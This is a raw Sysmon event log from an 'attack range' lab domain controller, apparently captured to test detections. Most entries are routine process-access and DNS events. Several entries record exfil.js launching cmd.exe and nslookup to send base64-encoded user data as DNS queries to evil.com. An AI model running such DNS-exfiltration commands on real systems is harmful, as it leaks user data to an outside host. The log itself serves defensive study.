YSTEM32\ntdll.dll+51791 10341000x8000000000000000204669Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.742{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-2942-000000005F02}2192C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204668Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.742{2E1864BB-17CE-629A-2742-000000005F02}37925988C:\Windows\system32\cmd.exe{2E1864BB-17CE-629A-2942-000000005F02}2192C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204667Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.754{2E1864BB-17CE-629A-2942-000000005F02}2192C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CE-629A-2742-000000005F02}3792C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvgkcv.tmp 2>&1 10341000x8000000000000000204666Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.726{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CE-629A-2842-000000005F02}4780C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204665Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.726{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CE-629A-2842-000000005F02}4780C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204664Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.711{2E1864BB-17CE-629A-2842-000000005F02}47808104C:\Windows\system32\conhost.exe{2E1864BB-17CE-629A-2742-000000005F02}3792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204663Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.695{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-2842-000000005F02}4780C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204662Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.685{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204661Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.685{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-2742-000000005F02}3792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204660Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.685{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204659Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.685{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204658Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.685{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204657Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.685{2E1864BB-17A1-629A-783D-000000005F02}55523236C:\Windows\System32\WScript.exe{2E1864BB-17CE-629A-2742-000000005F02}3792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000204656Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.978{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53116- 154100x8000000000000000204655Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.686{2E1864BB-17CE-629A-2742-000000005F02}3792C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvgkcv.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000204654Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.978{00000000-0000-0000-0000-000000000000}3848<unknown process>-udptruefalse127.0.0.1-53116-false127.0.0.1-53domain 354300x8000000000000000204653Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.978{00000000-0000-0000-0000-000000000000}3848<unknown process>-udpfalsefalse127.0.0.1-53115-false127.0.0.1-53domain 354300x8000000000000000204652Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.978{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53115- 354300x8000000000000000204651Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.978{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53115- 354300x8000000000000000204650Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.978{00000000-0000-0000-0000-000000000000}3848<unknown process>-udptruefalse127.0.0.1-53115-false127.0.0.1-53domain 354300x8000000000000000204649Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.978{00000000-0000-0000-0000-000000000000}3848<unknown process>-udpfalsefalse127.0.0.1-53114-false127.0.0.1-53domain 354300x8000000000000000204648Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.978{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53114- 354300x8000000000000000204647Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.977{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53114- 354300x8000000000000000204646Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.977{00000000-0000-0000-0000-000000000000}3848<unknown process>-udptruefalse127.0.0.1-53114-false127.0.0.1-53domain 354300x8000000000000000204645Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.869{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56356-false10.0.1.12-8000- 354300x8000000000000000204644Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.846{00000000-0000-0000-0000-000000000000}2736<unknown process>-udpfalsefalse127.0.0.1-53113-false127.0.0.1-53domain 354300x8000000000000000204643Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.846{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53113- 354300x8000000000000000204642Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.846{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53113- 354300x8000000000000000204641Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.846{00000000-0000-0000-0000-000000000000}2736<unknown process>-udptruefalse127.0.0.1-53113-false127.0.0.1-53domain 354300x8000000000000000204640Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.846{00000000-0000-0000-0000-000000000000}2736<unknown process>-udpfalsefalse127.0.0.1-53112-false127.0.0.1-53domain 354300x8000000000000000204639Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.846{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53112- 354300x8000000000000000204638Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.846{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53112- 354300x8000000000000000204637Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.846{00000000-0000-0000-0000-000000000000}2736<unknown process>-udptruefalse127.0.0.1-53112-false127.0.0.1-53domain 354300x8000000000000000204636Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.846{00000000-0000-0000-0000-000000000000}2736<unknown process>-udpfalsefalse127.0.0.1-53111-false127.0.0.1-53domain 354300x8000000000000000204635Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.846{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53111- 354300x8000000000000000204634Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.846{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53111- 354300x8000000000000000204633Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.846{00000000-0000-0000-0000-000000000000}2736<unknown process>-udptruefalse127.0.0.1-53111-false127.0.0.1-53domain 354300x8000000000000000204632Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.695{00000000-0000-0000-0000-000000000000}216<unknown process>-udpfalsefalse127.0.0.1-53110-false127.0.0.1-53domain 354300x8000000000000000204631Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.695{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53110- 23542300x8000000000000000204630Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.664{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvycp.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000204629Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.694{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53110- 354300x8000000000000000204628Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.694{00000000-0000-0000-0000-000000000000}216<unknown process>-udptruefalse127.0.0.1-53110-false127.0.0.1-53domain 354300x8000000000000000204627Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.694{00000000-0000-0000-0000-000000000000}216<unknown process>-udpfalsefalse127.0.0.1-53109-false127.0.0.1-53domain 354300x8000000000000000204626Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.694{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53109- 354300x8000000000000000204625Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.694{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53109- 354300x8000000000000000204624Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.694{00000000-0000-0000-0000-000000000000}216<unknown process>-udpfalsefalse127.0.0.1-53108-false127.0.0.1-53domain 354300x8000000000000000204623Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.694{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53108- 354300x8000000000000000204622Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.694{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53108- 354300x8000000000000000204621Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.694{00000000-0000-0000-0000-000000000000}216<unknown process>-udptruefalse127.0.0.1-53108-false127.0.0.1-53domain 354300x8000000000000000204620Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.557{00000000-0000-0000-0000-000000000000}5408<unknown process>-udpfalsefalse127.0.0.1-53107-false127.0.0.1-53domain 354300x8000000000000000204619Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.557{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53107- 354300x8000000000000000204618Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.557{00000000-0000-0000-0000-000000000000}5408<unknown process>-udptruefalse127.0.0.1-53107-false127.0.0.1-53domain 354300x8000000000000000204617Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.557{00000000-0000-0000-0000-000000000000}5408<unknown process>-udpfalsefalse127.0.0.1-53106-false127.0.0.1-53domain 354300x8000000000000000204616Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.557{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53106- 354300x8000000000000000204615Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.557{00000000-0000-0000-0000-000000000000}5408<unknown process>-udptruefalse127.0.0.1-53106-false127.0.0.1-53domain 354300x8000000000000000204614Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.557{00000000-0000-0000-0000-000000000000}5408<unknown process>-udpfalsefalse127.0.0.1-53105-false127.0.0.1-53domain 354300x8000000000000000204613Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.557{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53105- 354300x8000000000000000204612Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.556{00000000-0000-0000-0000-000000000000}5408<unknown process>-udptruefalse127.0.0.1-53105-false127.0.0.1-53domain 354300x8000000000000000204611Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.442{00000000-0000-0000-0000-000000000000}2388<unknown process>-udpfalsefalse127.0.0.1-53104-false127.0.0.1-53domain 354300x8000000000000000204610Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.442{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53104- 354300x8000000000000000204609Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.442{00000000-0000-0000-0000-000000000000}2388<unknown process>-udptruefalse127.0.0.1-53104-false127.0.0.1-53domain 354300x8000000000000000204608Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.326{00000000-0000-0000-0000-000000000000}4572<unknown process>-udpfalsefalse127.0.0.1-53103-false127.0.0.1-53domain 354300x8000000000000000204607Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.326{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53103- 354300x8000000000000000204606Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.326{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53103- 354300x8000000000000000204605Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.326{00000000-0000-0000-0000-000000000000}4572<unknown process>-udptruefalse127.0.0.1-53103-false127.0.0.1-53domain 354300x8000000000000000204604Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.326{00000000-0000-0000-0000-000000000000}4572<unknown process>-udpfalsefalse127.0.0.1-53102-false127.0.0.1-53domain 354300x8000000000000000204603Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.326{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53102- 354300x8000000000000000204602Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.326{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53102- 354300x8000000000000000204601Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.326{00000000-0000-0000-0000-000000000000}4572<unknown process>-udptruefalse127.0.0.1-53102-false127.0.0.1-53domain 354300x8000000000000000204600Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.325{00000000-0000-0000-0000-000000000000}4572<unknown process>-udpfalsefalse127.0.0.1-53101-false127.0.0.1-53domain 354300x8000000000000000204599Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.325{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53101- 354300x8000000000000000204598Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.325{00000000-0000-0000-0000-000000000000}4572<unknown process>-udptruefalse127.0.0.1-53101-false127.0.0.1-53domain 354300x8000000000000000204597Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.176{00000000-0000-0000-0000-000000000000}7224<unknown process>-udpfalsefalse127.0.0.1-53100-false127.0.0.1-53domain 